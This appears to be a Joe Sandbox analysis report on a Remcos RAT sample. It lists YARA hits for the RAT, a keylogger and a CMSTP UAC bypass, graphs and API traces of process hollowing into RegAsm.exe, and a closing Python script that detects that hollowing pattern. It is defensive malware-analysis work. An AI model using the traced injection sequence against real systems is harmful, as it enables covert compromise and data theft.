                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000008.00000002.398638126.00000000043B9000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                Reputation:high
                                                Has exited:true

                                                Target ID:9
                                                Start time:14:22:24
                                                Start date:11/09/2024
                                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                Imagebase:0xc30000
                                                File size:64'704 bytes
                                                MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.906391209.0000000000911000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000009.00000002.906121131.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                Reputation:high
                                                Has exited:false

                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.401335158.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_19d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 139a7876cb9d885c544b853d6970cf9dca0c133f71b8c7b6fbe84bf191369d62
                                                  • Instruction ID: 29f26500aa0dcce1b7585f73bbcbccbfdc3f2b70df169bc7e1144c840a3d7d2f
                                                  • Opcode Fuzzy Hash: 139a7876cb9d885c544b853d6970cf9dca0c133f71b8c7b6fbe84bf191369d62
                                                  • Instruction Fuzzy Hash: 58018F71504340ABEB104A26ECC4B67FF98EB41764F2C855AFC495B286C37A9845CAB2
                                                  Memory Dump Source
                                                  • Source File: 00000006.00000002.401335158.000000000019D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0019D000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_6_2_19d000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1f24c7f7273565d744ded1c97ea820b4fb60c618d8a7ecf2198649ae68ac584e
                                                  • Instruction ID: b5b563aafb47aefeec695138cf6847fcdcf20ccd993caaa9e70c1e428ccaaef8
                                                  • Opcode Fuzzy Hash: 1f24c7f7273565d744ded1c97ea820b4fb60c618d8a7ecf2198649ae68ac584e
                                                  • Instruction Fuzzy Hash: B2F06271504344AFEB108E16DCC4B66FFA8EB41724F18C55AFD585A296C37A9C44CAB1

                                                  Execution Graph

                                                  Execution Coverage:11%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:65.2%
                                                  Total number of Nodes:23
                                                  Total number of Limit Nodes:2
                                                  execution_graph 3608 254b48 3609 254b6f 3608->3609 3612 254c98 3609->3612 3613 254cc2 3612->3613 3614 254c84 3613->3614 3616 254d60 3613->3616 3618 254d93 3616->3618 3632 25172c 3618->3632 3619 254f5c 3620 251738 Wow64SetThreadContext 3619->3620 3621 25505b 3619->3621 3620->3621 3622 251774 WriteProcessMemory 3621->3622 3625 255384 3622->3625 3623 255623 3624 251774 WriteProcessMemory 3623->3624 3626 255674 3624->3626 3625->3623 3628 251774 WriteProcessMemory 3625->3628 3627 251780 Wow64SetThreadContext 3626->3627 3629 255777 3626->3629 3627->3629 3628->3625 3630 251798 ResumeThread 3629->3630 3631 255829 3630->3631 3631->3613 3633 255938 CreateProcessW 3632->3633 3635 255b2c 3633->3635

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 355 254d60-254d91 356 254d93 355->356 357 254d98-254ece 355->357 356->357 362 254ed5-254f0a 357->362 363 254ed0 357->363 365 254f37-254f7c call 25172c 362->365 366 254f0c-254f36 362->366 363->362 370 254fa5-254fcb 365->370 371 254f7e-254f9a 365->371 366->365 374 254fd2-255014 370->374 375 254fcd 370->375 371->370 379 255016 374->379 380 25501b-255047 374->380 375->374 379->380 382 255049-25507b call 251738 380->382 383 2550a8-2550d9 call 251744 380->383 390 2550a4-2550a6 382->390 391 25507d-255099 382->391 388 255102-25510c 383->388 389 2550db-2550f7 383->389 392 255113-255136 388->392 393 25510e 388->393 389->388 390->388 391->390 396 25513d-255181 call 251750 392->396 397 255138 392->397 393->392 402 255183-25519f 396->402 403 2551aa-2551b3 396->403 397->396 402->403 404 2551b5-2551dd call 25175c 403->404 405 2551df-2551e1 403->405 408 2551e7-2551fb 404->408 405->408 410 255224-25522e 408->410 411 2551fd-255219 408->411 412 255235-255259 410->412 413 255230 410->413 411->410 418 255260-2552b2 call 251768 412->418 419 25525b 412->419 413->412 423 2552b4-2552c8 418->423 424 2552ca-2552cc 418->424 419->418 425 2552d2-2552e6 423->425 424->425 426 255323-25533d 425->426 427 2552e8-255322 call 251768 425->427 429 255366-2553a4 call 251774 426->429 430 25533f-25535b 426->430 427->426 435 2553a6-2553c2 429->435 436 2553cd-2553d7 429->436 430->429 435->436 437 2553de-2553ee 436->437 438 2553d9 436->438 441 2553f5-25541d 437->441 442 2553f0 437->442 438->437 445 255424-255433 441->445 446 25541f 441->446 442->441 447 2555fe-25561d 445->447 446->445 448 255623-25564a 447->448 449 255438-255446 447->449 453 255651-255694 call 251774 448->453 454 25564c 448->454 450 25544d-255474 449->450 451 255448 449->451 457 255476 450->457 458 25547b-2554a2 450->458 451->450 460 255696-2556b2 453->460 461 2556bd-2556c7 453->461 454->453 457->458 465 2554a4 458->465 466 2554a9-2554dd 458->466 460->461 463 2556ce-2556fb 
461->463 464 2556c9 461->464 472 2556fd-255707 463->472 473 255708-255714 463->473 464->463 465->466 470 2554e3-2554f1 466->470 471 2555c9-2555d6 466->471 475 2554f3 470->475 476 2554f8-2554ff 470->476 479 2555dd-2555f1 471->479 480 2555d8 471->480 472->473 477 255716 473->477 478 25571b-25572b 473->478 475->476 481 255506-25554e 476->481 482 255501 476->482 477->478 483 255732-255763 478->483 484 25572d 478->484 485 2555f3 479->485 486 2555f8 479->486 480->479 496 255555-25557a call 251774 481->496 497 255550 481->497 482->481 489 255765-255772 call 251780 483->489 490 2557c4-2557f5 call 25178c 483->490 484->483 485->486 486->447 494 255777-255797 489->494 501 2557f7-255813 490->501 502 25581e-255824 call 251798 490->502 499 2557c0-2557c2 494->499 500 255799-2557b5 494->500 503 25557f-25559f 496->503 497->496 499->502 500->499 501->502 508 255829-255849 502->508 505 2555a1-2555bd 503->505 506 2555c8 503->506 505->506 506->471 510 255872-255915 508->510 511 25584b-255867 508->511 511->510
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextMemoryProcessThreadWow64Write
                                                  • String ID:
                                                  • API String ID: 3696009080-0
                                                  • Opcode ID: 25d0b759440d500678dee06db2fdcd919e67f637594868ad9b7867d25f5b3f56
                                                  • Instruction ID: afbe9d04ba2f696211c378ff4b8f3d270f11154df05012a5ff2f5acca9b00e70
                                                  • Opcode Fuzzy Hash: 25d0b759440d500678dee06db2fdcd919e67f637594868ad9b7867d25f5b3f56
                                                  • Instruction Fuzzy Hash: CA62E174D112288FEB64DF25C895BDDBBB2BB89301F5080EA980DA7291DB345E85CF54

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 70203c-70203f 1 702041-702043 0->1 2 702045-70204d 0->2 1->2 3 702065-702069 2->3 4 70204f-702053 2->4 7 702194-70219e 3->7 8 70206f-702073 3->8 5 702055 4->5 6 702059-702063 4->6 5->6 9 702057 5->9 6->3 10 7021a0-7021a9 7->10 11 7021ac-7021b2 7->11 12 7020b3 8->12 13 702075-702086 8->13 9->3 16 7021b4-7021b6 11->16 17 7021b8-7021c4 11->17 14 7020b5-7020b7 12->14 21 7021ec-70223b 13->21 22 70208c-702091 13->22 14->7 19 7020bd-7020c1 14->19 18 7021c6-7021e9 16->18 17->18 19->7 24 7020c7-7020cb 19->24 33 702241-702246 21->33 34 70243e-70244d 21->34 25 702093-702099 22->25 26 7020a9-7020b1 22->26 24->7 28 7020d1-7020f7 24->28 29 70209b 25->29 30 70209d-7020a7 25->30 26->14 28->7 45 7020fd-702101 28->45 29->26 30->26 37 702248-70224e 33->37 38 70225e-702262 33->38 42 702250 37->42 43 702252-70225c 37->43 40 7023e7-7023f1 38->40 41 702268-70226a 38->41 48 7023f3-7023fa 40->48 49 7023fd-702403 40->49 46 70227a 41->46 47 70226c-702278 41->47 42->38 43->38 51 702103-70210c 45->51 52 702124 45->52 53 70227c-70227e 46->53 47->53 54 702405-702407 49->54 55 702409-702415 49->55 56 702113-702120 51->56 57 70210e-702111 51->57 59 702127-702134 52->59 53->40 58 702284-7022a3 53->58 60 702417-70243b 54->60 55->60 61 702122 56->61 57->61 70 7022b3 58->70 71 7022a5-7022b1 58->71 65 70213a-702191 59->65 61->59 72 7022b5-7022b7 70->72 71->72 72->40 73 7022bd-7022c1 72->73 73->40 74 7022c7-7022cb 73->74 75 7022cd-7022dc 74->75 76 7022de 74->76 77 7022e0-7022e2 75->77 76->77 77->40 78 7022e8-7022ec 77->78 78->40 79 7022f2-702311 78->79 82 702313-702319 79->82 83 702329-702334 79->83 84 70231b 82->84 85 70231d-70231f 82->85 86 702343-70235f 83->86 87 702336-702339 83->87 84->83 85->83 88 702361-702374 86->88 89 70237c-702386 86->89 87->86 88->89 90 702388 89->90 91 70238a-7023d8 89->91 92 7023dd-7023e4 90->92 91->92
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: L4#p$L4#p$L4#p$X4$X4$d=1
                                                  • API String ID: 0-3261895890
                                                  • Opcode ID: d6b8f4aab0bd3ff9439d69c3417e029ca1a55c26b8cbcda993aaf9f12f50c38a
                                                  • Instruction ID: 609bf195f0f4cc0aeae353959137a8ad373c97bbb8e7721fbdfb608fa748a9d0
                                                  • Opcode Fuzzy Hash: d6b8f4aab0bd3ff9439d69c3417e029ca1a55c26b8cbcda993aaf9f12f50c38a
                                                  • Instruction Fuzzy Hash: 87B11532704348DFDF158F64C8487AEBBE2AF85310F2485AAE5119B2D2DB79DC46CB52

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 99 700b98-700bbb 100 700bc1-700bc6 99->100 101 700d96-700ddb 99->101 102 700bc8-700bce 100->102 103 700bde-700be2 100->103 111 700de1-700de6 101->111 112 700f32-700f4c 101->112 107 700bd0 102->107 108 700bd2-700bdc 102->108 104 700d43-700d4d 103->104 105 700be8-700bec 103->105 113 700d5b-700d61 104->113 114 700d4f-700d58 104->114 109 700bee-700bfd 105->109 110 700bff 105->110 107->103 108->103 115 700c01-700c03 109->115 110->115 116 700de8-700dee 111->116 117 700dfe-700e02 111->117 138 700f5e-700f7e 112->138 139 700f4e-700f5d 112->139 119 700d63-700d65 113->119 120 700d67-700d73 113->120 115->104 124 700c09-700c29 115->124 126 700df0 116->126 127 700df2-700dfc 116->127 122 700e08-700e0a 117->122 123 700edf-700ee9 117->123 121 700d75-700d93 119->121 120->121 129 700e1a 122->129 130 700e0c-700e18 122->130 132 700ef7-700efd 123->132 133 700eeb-700ef4 123->133 156 700c48 124->156 157 700c2b-700c46 124->157 126->117 127->117 135 700e1c-700e1e 129->135 130->135 140 700f03-700f0f 132->140 141 700eff-700f01 132->141 135->123 142 700e24-700e28 135->142 143 700f84-700f89 138->143 144 7010eb-70111d 138->144 139->138 145 700f11-700f2f 140->145 141->145 146 700e48 142->146 147 700e2a-700e46 142->147 150 700fa1-700fa5 143->150 151 700f8b-700f91 143->151 165 70112d 144->165 166 70111f-70112b 144->166 159 700e4a-700e4c 146->159 147->159 154 70109a-7010a4 150->154 155 700fab-700fad 150->155 160 700f93 151->160 161 700f95-700f9f 151->161 167 7010b2-7010b8 154->167 168 7010a6-7010af 154->168 162 700fbd 155->162 163 700faf-700fbb 155->163 170 700c4a-700c4c 156->170 157->170 159->123 169 700e52-700e65 159->169 160->150 161->150 174 700fbf-700fc1 162->174 163->174 176 70112f-701131 165->176 166->176 177 7010ba-7010bc 167->177 178 7010be-7010ca 167->178 196 700e6b-700e6d 169->196 170->104 171 700c52-700c54 170->171 181 700c64 171->181 182 700c56-700c62 171->182 174->154 183 700fc7-700fc9 174->183 185 701133-701139 
176->185 186 70117d-701187 176->186 179 7010cc-7010e8 177->179 178->179 189 700c66-700c68 181->189 182->189 191 700fd9 183->191 192 700fcb-700fd7 183->192 187 701147-701164 185->187 188 70113b-70113d 185->188 193 701192-701198 186->193 194 701189-70118f 186->194 209 701166-701177 187->209 210 7011ca-7011cf 187->210 188->187 189->104 199 700c6e-700c8e 189->199 201 700fdb-700fdd 191->201 192->201 197 70119a-70119c 193->197 198 70119e-7011aa 193->198 202 700e85-700edc 196->202 203 700e6f-700e75 196->203 205 7011ac-7011c7 197->205 198->205 227 700c90-700c96 199->227 228 700ca6-700caa 199->228 201->154 206 700fe3-700fe5 201->206 207 700e77 203->207 208 700e79-700e7b 203->208 215 700fe7-700fed 206->215 216 700fff-701003 206->216 207->202 208->202 209->186 210->209 220 700ff1-700ffd 215->220 221 700fef 215->221 217 701005-70100b 216->217 218 70101d-701097 216->218 222 70100d 217->222 223 70100f-70101b 217->223 220->216 221->216 222->218 223->218 232 700c98 227->232 233 700c9a-700c9c 227->233 234 700cc4-700cc8 228->234 235 700cac-700cb2 228->235 232->228 233->228 239 700ccf-700cd1 234->239 237 700cb4 235->237 238 700cb6-700cc2 235->238 237->234 238->234 242 700cd3-700cd9 239->242 243 700ce9-700d40 239->243 244 700cdb 242->244 245 700cdd-700cdf 242->245 244->243 245->243
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.398042053.0000000000700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00700000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_700000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: 8#;f$8#;f$l;1$l;1
                                                  • API String ID: 0-1332205951
                                                  • Opcode ID: 4a3e204ffc849452dfc0f290e9ba13a8a3fa8c0c04fd1ce4de019167c37b4cda
                                                  • Instruction ID: 77cf0456212511637e7ff7d1e4bf769f427b80c6bb188c6462925ca5668fc183
                                                  • Opcode Fuzzy Hash: 4a3e204ffc849452dfc0f290e9ba13a8a3fa8c0c04fd1ce4de019167c37b4cda
                                                  • Instruction Fuzzy Hash: 72F12531B04301CFDB259A79C8107BABBE2AF91320F2486BAD555DB2C1DB79DC41C7A2

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 247 25162f-251633 248 251635-251638 247->248 249 2516a8-2516ae 247->249 248->249 250 2516b0-2516b7 249->250 251 251723-251727 249->251 250->251 252 25179c 251->252 253 251729-2559c3 251->253 255 2517a2-2517d0 252->255 256 2559c5-2559d7 253->256 257 2559da-2559e8 253->257 267 2517d2-251861 255->267 256->257 258 2559ff-255a3b 257->258 259 2559ea-2559fc 257->259 261 255a3d-255a4c 258->261 262 255a4f-255b2a CreateProcessW 258->262 259->258 261->262 270 255b33-255bfc 262->270 271 255b2c-255b32 262->271 275 251867-251880 267->275 285 255c32-255c3d 270->285 286 255bfe-255c27 270->286 271->270 278 251882-251883 275->278 279 25180b-251861 275->279 279->275 290 255c3e 285->290 286->285 290->290
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 10960584fdc79ac5c6531557d79ccb681f1186bd7e06a39e38518a3f67d8a3b4
                                                  • Instruction ID: 17e0831e302eb3d27ab087b06cc36757d18fb3a785fcc067cd86259b1c0d5465
                                                  • Opcode Fuzzy Hash: 10960584fdc79ac5c6531557d79ccb681f1186bd7e06a39e38518a3f67d8a3b4
                                                  • Instruction Fuzzy Hash: BEB14A71C093A98FDB22CF64C850BDDBBB0AF06304F0590E6D548AB262D7345E99CF55

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 291 25172c-2559c3 293 2559c5-2559d7 291->293 294 2559da-2559e8 291->294 293->294 295 2559ff-255a3b 294->295 296 2559ea-2559fc 294->296 297 255a3d-255a4c 295->297 298 255a4f-255b2a CreateProcessW 295->298 296->295 297->298 302 255b33-255bfc 298->302 303 255b2c-255b32 298->303 312 255c32-255c3d 302->312 313 255bfe-255c27 302->313 303->302 317 255c3e 312->317 313->312 317->317
                                                  APIs
                                                  • CreateProcessW.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00255B17
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 3160190bff211dd433d87f6bd9f07e6fc41af37c0df14daae7e4dcffffc17959
                                                  • Instruction ID: db7a6055d60b61a278e18d0c38c78c6b095d14ca5a5beef0664c71952c6a9682
                                                  • Opcode Fuzzy Hash: 3160190bff211dd433d87f6bd9f07e6fc41af37c0df14daae7e4dcffffc17959
                                                  • Instruction Fuzzy Hash: E781C275D0022D9FDF25CFA5C940BDDBBB1AB09304F0090AAE549B7210DB749E99CF94

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 318 251774-256007 320 25601e-25607e WriteProcessMemory 318->320 321 256009-25601b 318->321 322 256087-2560c5 320->322 323 256080-256086 320->323 321->320 323->322
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0025606E
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: edf1c3bfe3a9a8c20bda0565bf6e44e533af7965d720b58625932d9c28d17d8b
                                                  • Instruction ID: 34c3e4387b5cb3073963dd23266bdfaf33c94f0bce68a82b36b7cda3f959977b
                                                  • Opcode Fuzzy Hash: edf1c3bfe3a9a8c20bda0565bf6e44e533af7965d720b58625932d9c28d17d8b
                                                  • Instruction Fuzzy Hash: E9417BB5D142589FCF10CFA9D984ADEFBF1BB09310F24902AE818B7250D375AA55CB58

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 326 251738-255ccc 328 255ce3-255d2a Wow64SetThreadContext 326->328 329 255cce-255ce0 326->329 330 255d33-255d6b 328->330 331 255d2c-255d32 328->331 329->328 331->330
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00255D1A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: c0ddc06f599fc55466561b079eb1de0ff2f96d8759f04825b94a8ff355d7d9cf
                                                  • Instruction ID: 47773124d1b143c3929a7eecd5750ee6df46aed3dcfdb81b0d86d13609990a2c
                                                  • Opcode Fuzzy Hash: c0ddc06f599fc55466561b079eb1de0ff2f96d8759f04825b94a8ff355d7d9cf
                                                  • Instruction Fuzzy Hash: 27318BB5D116589FCB10CFAAD984ADEBBF1AB49314F24802AE814B7310D378A949CF58

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 334 251780-255ccc 336 255ce3-255d2a Wow64SetThreadContext 334->336 337 255cce-255ce0 334->337 338 255d33-255d6b 336->338 339 255d2c-255d32 336->339 337->336 339->338
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00255D1A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: c099c267d55bb2ff1d349f3d3cd1285f47e0f19d92331e96c2a4a80c8202e12d
                                                  • Instruction ID: b839788953ce52181ca90c47d3c0d1bd4d49b2f5d7bd46b494288517ead2eeae
                                                  • Opcode Fuzzy Hash: c099c267d55bb2ff1d349f3d3cd1285f47e0f19d92331e96c2a4a80c8202e12d
                                                  • Instruction Fuzzy Hash: 79318CB5D116589FCB10CFA9D584ADEBBF1AB49314F24802AE818B7210D374A949CF94

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 342 255c69-255ccc 343 255ce3-255d2a Wow64SetThreadContext 342->343 344 255cce-255ce0 342->344 345 255d33-255d6b 343->345 346 255d2c-255d32 343->346 344->343 346->345
                                                  APIs
                                                  • Wow64SetThreadContext.KERNEL32(?,?), ref: 00255D1A
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ContextThreadWow64
                                                  • String ID:
                                                  • API String ID: 983334009-0
                                                  • Opcode ID: 0916e2601e0b533d347f6641340c7de7649f59bcd8682e4d343bc19cfdd0da00
                                                  • Instruction ID: 500254f95e62a2d79c4b2684c98e8b741c76195df1bb9b241aa56bb5ea704885
                                                  • Opcode Fuzzy Hash: 0916e2601e0b533d347f6641340c7de7649f59bcd8682e4d343bc19cfdd0da00
                                                  • Instruction Fuzzy Hash: 27319AB5D112589FCB10CFAAD984ADEFBF1BB49314F24802AE818B7250D378A949CF54

Control-flow Graph
• Rendered graph (block data omitted): ResumeThread is called in the entry block 251798-256166; both successors (256168-25616e and 25616f-25619d) converge on 25616f-25619d.
                                                  APIs
                                                  • ResumeThread.KERNELBASE(?), ref: 00256156
                                                  Memory Dump Source
                                                  • Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_8_2_250000_powershell.jbxd
                                                  Similarity
                                                  • API ID: ResumeThread
                                                  • String ID:
                                                  • API String ID: 947044025-0
                                                  • Opcode ID: b4968c31f56c1cddc3ce02c5e223c9740c27c5dc7f7f5d8eb1e21994dd15c27e
                                                  • Instruction ID: 9fe90367de426dba42b0a57af4151ac666d047f60e87f233ae6c14088fdd5c84
                                                  • Opcode Fuzzy Hash: b4968c31f56c1cddc3ce02c5e223c9740c27c5dc7f7f5d8eb1e21994dd15c27e
                                                  • Instruction Fuzzy Hash: CC21AEB9D106189FCB10CF99D484ADEFBF4EB09310F20905AE818B7310D375A945CFA9
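
The two entries above place Wow64SetThreadContext (call site 00255D1A) and ResumeThread (call site 00256156) in the same memory region of process 8 (powershell, per the snapshot name hcaresult_8_2_250000_powershell.jbxd), a region marked "based on PE: false", i.e. not backed by a mapped image. A thread-context write followed by a resume out of unbacked memory is the tail of a hollowing or thread-hijack sequence. The script below is an added example and not part of the Joe Sandbox report: it parses entries in the report's own format (an APIs list followed by a Memory Dump Source line), groups call sites by process and region, and flags unbacked regions that combine both calls. The sample text is constructed; its first two entries copy the references shown above and the third (a RegOpenKeyExA call inside a PE-backed image) is made up as a negative case.

```python
import re
from typing import Dict, List, NamedTuple, Tuple

# Constructed sample in the shape of the report's function entries. The first two
# entries copy the Wow64SetThreadContext / ResumeThread references shown above; the
# third (a RegOpenKeyExA call inside a PE-backed image) is made up as a negative case.
SAMPLE_ENTRIES = """\
APIs
• Wow64SetThreadContext.KERNEL32(?,?), ref: 00255D1A
Memory Dump Source
• Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
APIs
• ResumeThread.KERNELBASE(?), ref: 00256156
Memory Dump Source
• Source File: 00000008.00000002.397934199.0000000000250000.00000040.00000800.00020000.00000000.sdmp, Offset: 00250000, based on PE: false
APIs
• RegOpenKeyExA.ADVAPI32(?,?,?,?), ref: 00413584
Memory Dump Source
• Source File: 00000008.00000002.397905010.0000000000400000.00000002.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
"""

API_LINE = re.compile(
    r"^[•*-]?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SOURCE_LINE = re.compile(
    r"Source File:\s*(?P<pid>[0-9A-Fa-f]{8})\.\S+,\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),"
    r"\s*based on PE:\s*(?P<pe>true|false)"
)

# APIs that rewrite a suspended thread's context (entry-point redirection) and the
# calls that release the thread afterwards.
CONTEXT_WRITERS = {"SetThreadContext", "Wow64SetThreadContext", "NtSetContextThread"}
RESUMERS = {"ResumeThread", "NtResumeThread"}


class ApiRef(NamedTuple):
    pid: int         # analysis process id (first dotted field of the .sdmp name)
    offset: int      # base address of the dumped region
    pe_backed: bool  # "based on PE: true" means the dump is a mapped image
    api: str
    ref: int         # address of the call site


def parse_entries(text: str) -> List[ApiRef]:
    """Walk the report text; API lines accumulate until the next Memory Dump Source line."""
    refs: List[ApiRef] = []
    pending: List[Tuple[str, int]] = []
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            pending = []
            continue
        m = API_LINE.match(line)
        if m:
            pending.append((m.group("api"), int(m.group("ref"), 16)))
            continue
        m = SOURCE_LINE.search(line)
        if m:
            pid = int(m.group("pid"), 16)
            offset = int(m.group("off"), 16)
            backed = m.group("pe") == "true"
            refs.extend(ApiRef(pid, offset, backed, api, ref) for api, ref in pending)
            pending = []
    return refs


def find_hollowing(refs: List[ApiRef]) -> List[dict]:
    """Flag unbacked regions that both rewrite a thread context and resume a thread."""
    by_region: Dict[Tuple[int, int, bool], List[ApiRef]] = {}
    for r in refs:
        by_region.setdefault((r.pid, r.offset, r.pe_backed), []).append(r)
    findings = []
    for (pid, offset, backed), items in by_region.items():
        apis = {r.api for r in items}
        if backed or not (apis & CONTEXT_WRITERS) or not (apis & RESUMERS):
            continue
        findings.append({
            "pid": pid,
            "offset": offset,
            "apis": sorted(apis),
            "call_sites": sorted(r.ref for r in items),
        })
    return findings


if __name__ == "__main__":
    for f in find_hollowing(parse_entries(SAMPLE_ENTRIES)):
        sites = ", ".join(f"{s:08X}" for s in f["call_sites"])
        print(f"pid {f['pid']}: unbacked region {f['offset']:#x} calls {f['apis']} at {sites}")
```

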